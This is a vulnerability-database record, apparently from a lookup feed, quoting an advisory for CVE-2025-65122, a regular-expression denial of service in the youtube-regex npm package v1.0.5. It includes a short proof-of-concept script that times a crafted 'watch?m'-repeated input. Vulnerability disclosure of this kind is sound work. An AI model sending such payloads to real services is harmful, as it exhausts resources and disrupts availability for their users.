{"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}